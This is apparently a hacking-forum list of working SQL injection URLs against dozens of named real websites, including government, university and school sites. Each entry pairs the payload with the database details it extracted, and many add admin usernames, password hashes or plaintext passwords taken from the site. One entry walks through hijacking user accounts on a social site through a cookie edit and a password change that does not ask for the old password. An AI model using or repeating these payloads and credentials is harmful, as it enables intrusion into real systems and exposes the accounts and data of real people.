Code: http://www.povituha.ru/news.php?id=9999+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--+ db: 5.0.32-Debian_7etch3-log name_db: povituha user: povit_gst@localhost ----------------------------- ----------------------------- Code: http://oculus.ru/blog.php?id=106&a=-9+union+select+unhex(hex(concat_ws(0x3a,version(),database(),user()))),2,3,4,5,6,7--+ db: 4.1.14-log name_db: oculus user: oculus@localhost
Code: http://hcch.e-vision.nl/index_en.php?act=status.accept&mid=262+union+select+1,2,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),4,5,6,7,8/* version():4.1.11-Debian_4sarge7-log database():hcch user():hcch@localhost Code: http://hcch.e-vision.nl/index_en.php?act=status.accept&mid=262+union+select+1,2,unhex(hex(concat(user,0x3a,password))),4,5,6,7,8+from+mysql.user/*
Code: http://scriptorium.serve-it.nl/view.php?sid=54+union+select+1,unhex(hex(concat(version(),0x3a,database(),0x3a,user()))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+limit+1,1/* version():4.1.12-standard database():serve_scriptorium user():serve_serve@localhost
pr4 Code: http://imperial.ca.gov/section.php?id=17+and+ascii(substring(y()),1,1))=x y1=version y2=user x1=53,46,48,46,48,55 x2=114,105,98,97,114,100,111,104,100,122,64,108,111,99,97,108,104,111,115,116 version() - 5.0.07 user() - ribardohdz@localhost
worldstart.com pr=5 Code: http://worldstart.com/kb/answers.php?sku=3917+and+1=0+union+select+1,2,3,concat_ws(0x20,user(),database(),version(),@@basedir,@@datadir,@@tmpdir,@@version_compile_os),5+--%20-- Code: [email protected] kb 5.0.45 /usr/ /var/lib/mysql/ /tmp/ redhat-linux-gnu
geometria.ru geometria:[email protected]:5.0.45-log We go into information_schema. There is an interesting table, "user". I liked the columns: login, password =) We dump the first 500 from the database. At the moment there are 176055 working accounts in total. The password is hashed with who knows what, maybe md5 with a salt, but I did not find a column with it, and we do not need it anyway.)) So we pick a user, for example "Fusion". Fusion:mfjrhju2pua8lj4ob7k3n20e81 Right, good. Next, if you are registered, go into cookie editing. Change PHPSESSID, OK, F5, and now we are under someone else's login. Click on our login to get to the page with the user's info, then click on change details. The trick is that changing the password does not ask for the old password) so we enter the new password twice, then "change", and that is it.=)
http://www.uoit.ca/calendar/0405/info-display.php?ID=-83/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**//* Database Version: 4..20-standard Database name: uoitcalendar0405 User name: uoitcalendar0405@localhost http://www.quantumbindery.ca/bindery-equipment/equipment-display.php?id=-10/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8/**//* Database Version: 4.1.22-standard Database name: quantum_products User name: quantum_leap@localhost
Code: http://ladyfitness.ru/php/photo.php3?id=999+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8--+ db: 5.0.51 name_db: ladyfit user: db_user@localhost os: portbld-freebsd6.2 table: users db: pun_bb -=admin=- log: admin pass: 36058a75bd500c96eeaca789e9f1fe1d758e7f66 -=users=- +limit+x,x--+
Greek shop (pr = 3) Code: http://www.roses2u.gr/detail.php?flowerid=-69+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5+-- user() = roses2u_roses@localhost database() = roses2u_roses version() = 5.0.67-community Code: http://www.roses2u.gr/detail.php?flowerid=-69+union+select+1,2,3,concat_ws(0x3a,username,password),5+from+users+-- username = roses2u password = rc4#7! a parody of an admin panel: http://roses2u.gr/console/
<<Information and reference service>> Code: http://help-nova.ru/index.php?cat=1&subcat=-164+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5-- db: 5.0.51a-community-log name_db: helpnov_help user: helpnov_help@localhost os: redhat-linux-gnu table: pmd_admin -=admin=- log: admin pass: savva table: pmd_users Code: http://help-nova.ru/index.php?cat=1&subcat=-164+union+select+1,2,3,concat_ws(0x3a,login,pass),5+from+pmd_users--+ and all the users.... -------------------------------------- <<HeppyWoman>> Code: http://happywoman.com.ua/article&pid=571&parent=999'+union+select+concat_ws(0x3a,table_name,table_schema)+from+information_schema.columns+where+column_name+like+0x70617373776f7264--+ db: 5.0.75 name_db: happywoman user: dbhappywoman@localhost os: portbld-freebsd7.0 ------------------------------- http://happywoman.com.ua/admin/ ------------------------------- table: cns_users db: cnstats -=admins=- log: admin pass: 2E6975A9DE99EA679B328195AB5B3AB5BA22FD8C -=users=- log: fortest pass: fortest +limit+x,x--+
http://www.beattyhigh.net/scrapbook/photo.php?id=11/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10/**/LIMIT/**/1,1/* Database Version: 4.1.25-Debian_mt1 Database name: brightideasutah_com_-_bhsgen User name: [email protected] 4 users in the users table id:pass:user 1:starwars:icem 13:friday:admin 24:stinger:webed 25:hotdog:richicem
Database Version: 5.0.32-Debian_7etch8 Database name: engine User name: [email protected] Login: admin Pass: fightingf1sh
Pagerank: 6 http://www.asia-anf.org/NewsDetails.php?NewsId=-166+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6-- Database Version: 4.1.22-standard Database name: asinanoo_anf User name: asinanoo_admin@localhost
PR - 5 Code: http://www.hockeyboss.ru/index.php?action=0&id=42+union+select+1,concat_ ws(0x3a,version(),database(),user()),3,4,5,6-- Database Version : 5.0.32-Debian_7etch6-log Database name : superligaDB User name : [email protected] admin : Code: http://www.hockeyboss.ru/index.php?action=0&id=42+union+select+1,2,concat_ws(0x3a,username,passwd),4,5,6+from+users+where+username=ch ar(97,100,109,105,110)-- Code: Admin:*10C76DCEABF030E275D0809D5F6C5438CD671BA1 - 957762
Database Version: 4.0.27-max-log Database name: db189841794 User name: [email protected] Database Version: 5.0.67-log Database name: shoot1 User name: [email protected] 4 admin panel competitions:2de809f72949339e849d2b73e39576fa : comps@2468 - marketing:eb75757f1517f30eaecd258f2d746e02 : ??? - claire:67d0f2f380bf297e35c354191caec8bd : ??? - innovative:4a58d6a4040d95671dfcb74f1fbaf592 : ???
Code: http://www.tennoil.com/newsletter.php?id=-252+union+select+1 Database Version: 4.1.12 Database name: tennoil User name: tennoil@localhost Code: http://www.israelunitycoalition.org/news/newsletter.php?id=-121633+union+select+1,2,3,concat(user(),0x3a,version()),5,6,7,8,9,0,1/* Israel pr5 ucing@localhost:5.0.45 Code: http://anthenv.web.arizona.edu/Newsletter.php?Id=53333+union+select+1,concat(Username,0x3a,Password),3,UserId,5,6+from+Users EDU Database Version: 5.0.22 Database name: anthenv User name: anthenv@localhost - username:sdowney pass:chaos95 http://anthenv.web.arizona.edu/login.php doesn't work for some reason
http://www.neuroscience-tuebingen.de/research-groups/display.php?type=Department&id=-37/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* User name: neuroscience@localhost Database Version: 5.0.18 Database name: dbneuroscience
attajdid.info PageRank 7 Code: http://www.attajdid.info/def.asp?codelangue=6&infoun=48015+UNION+SELECT+'0','1',concat_ws(0x3a,version(),user()),'3','4','5','6','7','8','9','10','11'%20,'12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36'-- 5.0.67-community-nt:zaherland@localhost
Pagerank: 5 http://www.billybishop.org/newsfull.php?NewsID=-19+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),14,15,16,17,18,19 Database Version: 4.1.20 Database name: osmuseums User name: mrailbishop@localhost Os : redhat-linux-gnu